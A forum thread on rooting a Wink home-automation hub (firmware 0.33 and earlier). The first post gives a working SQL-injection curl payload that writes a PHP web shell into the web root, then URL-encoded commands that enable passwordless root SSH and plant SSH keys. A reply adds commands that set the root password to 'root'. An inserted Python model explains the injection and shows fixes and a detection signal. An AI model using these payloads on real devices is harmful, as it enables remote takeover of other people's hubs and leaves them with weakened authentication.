
Wink Hub root

By FreeFly, Member on 10th December 2014, 09:47 PM
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

First use a curl command to exploit a SQL injection vulnerability to create a php file used to execute shell commands on the hub:
Code:
curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('<?php passthru(' || char(36) || '_POST[' || char(39) || 'cmd' || char(39) || ']); ?>');--" http://192.168.0.1/dev_detail.php
Now you can supply shell commands to the exploit.php.

If you don't want to mess with ssh keys, now you can run this command to enable root login without using a password. My recommendation would be to immediately ssh in and use the passwd command to change the root password.

Code:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart%3Becho%20-e%20%22%5Cn%5Cn%22%20%7C%20passwd' http://192.168.0.1/exploit.php
For those who don't mind using ssh keys, or want to run other commands:

On the machine I want to copy my ssh key to root so I'd run something like this:
Code:
echo MySSH_PublicKey > /root/.ssh/authorizedkeys
It would be nice if you could just call:
Code:
curl -d cmd='echo MySSH_PublicKey > /root/.ssh/authorizedkeys'
But that won't generally work because of http issues. The key is to urlencode the cmd you want to run using a site like http://meyerweb.com/eric/tools/dencoder/
Just urlencode the bits between the single quotes, the php exploit won't work without the single quotes.

So after getting the urlencoded command I actually invoke:
Code:
curl -d cmd='echo%20MySSH_PublicKey%20%3E%20%2Froot%2F.ssh%2Fauthorizedkeys' http://192.168.0.1/exploit.php
Then you can happily ssh as root to the wink hub!
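
Added example, not part of the thread and not Wink's code: a Python model of why the ATTACH DATABASE step in the post above works against SQL built by string concatenation, next to two fixes (parameter binding, and a SQLite authorizer that denies ATTACH). The `devices` table, the file names and the harmless marker payload are constructed for illustration.

```python
import os
import sqlite3
import tempfile

SQLITE_ATTACH = 24  # authorizer action code for ATTACH, from sqlite3.h

def open_db(path, deny_attach=False):
    """Constructed stand-in for the hub's device database."""
    db = sqlite3.connect(path)
    db.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO devices VALUES (1, 'lamp')")
    db.commit()
    if deny_attach:
        # Veto ATTACH when a statement is compiled; allow everything else.
        db.set_authorizer(lambda action, *_: sqlite3.SQLITE_DENY
                          if action == SQLITE_ATTACH else sqlite3.SQLITE_OK)
    return db

def lookup_concat(db, dev_id):
    # Flawed pattern: input pasted into SQL and run by a multi-statement API.
    db.executescript("SELECT name FROM devices WHERE id=" + dev_id + ";")

def lookup_bound(db, dev_id):
    # Hardened pattern: a single statement with the input bound as a value.
    return db.execute("SELECT name FROM devices WHERE id = ?", (dev_id,)).fetchall()

def demo():
    tmp = tempfile.mkdtemp()
    drop = os.path.join(tmp, "dropped.php")  # stands in for a web-root path
    payload = ("1; ATTACH DATABASE '%s' AS lol; CREATE TABLE lol.pwn (t TEXT); "
               "INSERT INTO lol.pwn (t) VALUES ('constructed marker');--" % drop)
    out = {}
    db = open_db(os.path.join(tmp, "a.db"))
    lookup_concat(db, payload)
    db.close()
    with open(drop, "rb") as f:  # the dropped file is a SQLite database
        out["dropped_magic"] = f.read(16)
    os.remove(drop)
    db = open_db(os.path.join(tmp, "b.db"), deny_attach=True)
    try:
        lookup_concat(db, payload)
        out["attach_denied"] = False
    except sqlite3.Error:
        out["attach_denied"] = not os.path.exists(drop)
    out["bound_payload"] = lookup_bound(db, payload)
    out["bound_valid"] = lookup_bound(db, "1")
    out["file_after_hardening"] = os.path.exists(drop)
    db.close()
    return out
```

The `dropped_magic` value also gives a detection signal: a `.php` file under the web root that begins with the SQLite header `SQLite format 3` was written by a database engine, not by a deploy.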
 
 
10th December 2014, 09:50 PM |#2  
Senior Member
Quote:
Originally Posted by FreeFly

Then you can happily ssh as root to the wink hub!

FIRST REPLY!

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

https://github.com/nashira/blink

10th December 2014, 10:36 PM |#3  
Junior Member
This is awesome. Thanks for the great work
10th December 2014, 11:05 PM |#4  
Junior Member
Nice work. This will make things much easier.

Some people (people running Windows for instance) are having issues generating the ssh keys. As a suggestion, can we incorporate the below so that people can just log in as root using a password? I believe this would make things even simpler.

Code:
#commands to allow root login using root as password
sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart
echo -e 'root\nroot' | passwd
I don't have enough posts to provide the exact command, but it should be something like:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart' hxxp/ipaddress/exploit.php
curl -d cmd='echo%20-e%20%22root%5Cnroot%22%20%7C%20passwd' hxxp/ipaddress/exploit.php
11th December 2014, 12:51 AM |#5  
Junior Member
Quote:
Originally Posted by FreeFly

Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

Very nice!

I started looking for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloading the app-rootfs.ubi manually and using ubiformat to flash it on.

However, in the official Wink app it's still showing me version 0. I've been wading through the upgrade scripts to see where it sets version 33; it's in /database somewhere. If you could take a look at your device and let me know, I'd very much appreciate it.

I also have a pretty good script that downloads the update and re-exploits the update before it installs the update with ubiformat. There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

If anyone has set up a Kidde smoke alarm via aprontest, let me know. I have had much luck as of yet. I'll certainly post if I make some headway.
11th December 2014, 01:09 AM |#6  
Junior Member
Quote:
Originally Posted by berserko

Very nice!

I started looking for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloading the app-rootfs.ubi manually and using ubiformat to flash it on.

However, in the official Wink app it's still showing me version 0. I've been wading through the upgrade scripts to see where it sets version 33; it's in /database somewhere. If you could take a look at your device and let me know, I'd very much appreciate it.

I also have a pretty good script that downloads the update and re-exploits the update before it installs the update with ubiformat. There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

If anyone has set up a Kidde smoke alarm via aprontest, let me know. I have had much luck as of yet. I'll certainly post if I make some headway.

Here are the files that report the versions to the app.

echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.33" > /database/cf_fver3
11th December 2014, 01:52 AM |#7  
Junior Member
Quote:
Originally Posted by berserko

There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

Someone over at slickdeals did but doesn't look like there is anything happening over there yet. He's got some links but that is about it.

homeautomation proboards com/board/3/wink-hub

---------- Post added at 01:52 AM ---------- Previous post was at 01:16 AM ----------

Quote:
Originally Posted by FreeFly

Then you can happily ssh as root to the wink hub!

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
11th December 2014, 03:02 AM |#8  
OP Member
Quote:
Originally Posted by nyvram1

We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
11th December 2014, 03:21 AM |#9  
Junior Member
00.47 is out and this particular sql injection has been closed
11th December 2014, 04:21 AM |#10  
Junior Member
Quote:
Originally Posted by nyvram1

FIRST REPLY!

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

I'm also interested in Nashira's project, but I'm looking to use his work to figure out how to send commands from a Raspberry Pi that will be the equivalent of pushing a light-on button on the Android app. Being able to issue commands to the wink by running a python script, for example, would open up the hub to be used in conjunction with lots of home automation platforms. I have a bunch of cheap Arduino sensors integrated with an open source home automation system that is much more flexible than Wink, so I'd just like to use the Wink hub for its radios.

It looks like you can do an HTTP post to mimic a button push, but that's something I'm not familiar with. If someone has any insights, I'd appreciate it.

---------- Post added at 05:21 AM ---------- Previous post was at 05:13 AM ----------

Quote:
Originally Posted by FreeFly

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.

Hey, that's what I'm interested in too. Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?

Quote:
Originally Posted by qnology

00.47 is out and this particular sql injection has been closed

Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
11th December 2014, 12:45 PM |#11  
OP Member
Quote:
Originally Posted by automonkey

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?

Did you try the passwordless method?